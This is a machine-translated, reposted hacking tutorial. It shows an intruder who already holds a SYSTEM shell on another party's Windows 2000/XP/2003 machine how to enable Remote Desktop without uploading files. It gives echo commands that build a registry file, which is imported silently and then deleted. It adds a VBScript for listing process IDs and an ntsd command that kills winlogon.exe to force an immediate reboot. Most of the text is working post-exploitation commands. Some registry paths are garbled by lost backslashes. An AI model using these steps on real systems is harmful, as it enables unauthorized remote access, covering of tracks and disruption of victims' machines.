The easiest way to enable full attack on a terminal

Source: Internet
Author: User

The easiest way to start a terminal
The terminal-based method introduced today is green, environmentally friendly, and pollution-free ~~
You do not need to upload any files to enable the terminal. This method is applicable to win2k, xp, and 2003.
In this article, the premise is that you have obtained an external shell with the SYSTEM permission of the other Party through some method ~~
Enable the terminal service without uploading any files.
1. Enable the terminal under win 2 K
First, use ECHO to write a 3389. reg file and then import it to the Registry. The echo code is as follows:

Echo Windows Registry Editor Version 5.00> 3389.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionetcache]> 3389.reg
Echo "Enabled" = "0"> 3389.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]> 3389.reg
Echo "ShutdownWithoutLogon" = "0"> 3389.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]> 3389.reg
Echo "EnableAdminTSRemote" = dword: 00000001> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]> 3389.reg
Echo "TSEnabled" = dword: 00000001> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]> 3389.reg
Echo "Start" = dword: 00000002> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]> 3389.reg
Echo "Start" = dword: 00000002> 3389.reg
Echo [HKEY_USERS.DEFAULTKeyboard LayoutToggle]> 3389.reg
Echo "Hotkey" = "1"> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsdpwdTdscp]> 3389.reg
Echo "PortNumber" = dword: 00000D3D> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]> 3389.reg
Echo "PortNumber" = dword: 00000D3D> 3389.reg
Paste the ECHO code under mongoshell to generate the 3389. reg file, and then regedit/s 3389. reg to import the registry.
(If you want to change the terminal port, you only need to change the two D3D above)
Because Windows 2 k terminal cannot take effect immediately like XP, it takes effect only after the machine is restarted.
Simply use ntsd.exe (the command above win 2 K) to end an important process and restart the machine !!
For example, if the restart winlogon.exe, lsass.exe can also be used, but the restart countdown will pop out after the end (not good ~)
After winlogon.exe is disabled, the machine is forced to restart immediately.
The Command Execution format is ntsd-c q-p PID.
Which of the following is the PID process Number of winlogon.exe ~
The following script lists the PID of all processes:

Wscript. echo "PID ProcessName"
For each ps in getobject ("winmgmts: \. ootcimv2: win32_process"). instances _
Wscript. echo ps. handle & vbtab & ps. name
Next
Paste the following ECHO code in the CMDSHELL window to obtain the script 1.vbefor viewing the process PID:
Echo wscript. echo "PID ProcessName"> 1.vbe
Echo for each ps in getobject ("winmgmts: \. ootcimv2: win32_process"). instances _> 1.vbe
Echo wscript. echo ps. handle ^ & vbtab ^ & ps. name> 1.vbe
Echo next> 1.vbe

1. After vbe is generated, check whether the script generated by the echo is correct (only four lines are available. Check the above ).
Run 1. vbe to get the following running result:

C: WINNTsystem32> cscript 1.vbe
Cscript 1.vbe
Microsoft (R) Windows Script Host version 5.1 for Windows
Copyright (C) Microsoft Corporation 1996-1999. All rights reserved.

PID ProcessName
0 System Idle Process
8 System
152 smss.exe
180 csrss.exe
200 winlogon.exe
228 services.exe
240 lsass.exe
424 svchost.exe
472 spoolsv.exe
512 msdtc.exe
616 svchost.exe
628 KAVSvc. EXE
660 llssrv.exe
692 nvsvc32.exe
728 regsvc.exe
748 MSTask.exe
776 alter.exe
900 svchost.exe
916 WinMgmt.exe
1088 Dfssvc.exe
484 Explorer. EXE
1444 mdm.exe
1340 Server.exe
1224 ibguard.exe
1252 KAVSvcUI. EXE
1256 ibserver.exe
1336 internat.exe
1204 Uspds.exe
720 bar.exe
1288 dllhost.exe
1580 inetinfo.exe
1672 cmd.exe
1464 pppoe.exe
1704 regedit.exe
316 cscript.exe

From the beginning, we can see that the PID of winlogon.exe is 200. Run the ntsd-c q-p 200 command (Replace with the pid of the winlogon.exe process ).

Restart (ntsd.exe is the built-in function of WIN to end any process ~~

Ii. Enable winxp and win2003 Terminals

The code for enabling the REG file is as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
"FDenyTSConnections" = dword: 00000000
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsdpwdTdscp]
"PortNumber" = dword: 00000D3D
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]
"PortNumber" = dword: 00000D3D
Use the following ECHO code to write a REG file:
Echo Windows Registry Editor Version 5.00> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]> 3389.reg
Echo "fDenyTSConnections" = dword: 00000000> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsdpwdTdscp]> 3389.reg
Echo "PortNumber" = dword: 00000d3d> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]> 3389.reg
Echo "PortNumber" = dword: 00000d3d> 3389.reg
Regedit/s 3389.reg
Del 3389.reg
In this way, you do not need to restart the xp and 2003 terminal. If you want to change the port, you only need to change the D3D corresponding to the two portnumbers above to the hexadecimal format of the corresponding decimal number! Use a calculator for conversion. In XP, no restart is required whether to enable the terminal or change the terminal port. This is really amazing ~~ Haha. If you want to disable final close, you only need to set "fDenyTSConnections" = dword: 00000000

Change to "fDenyTSConnections" = dword: 00000001.

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.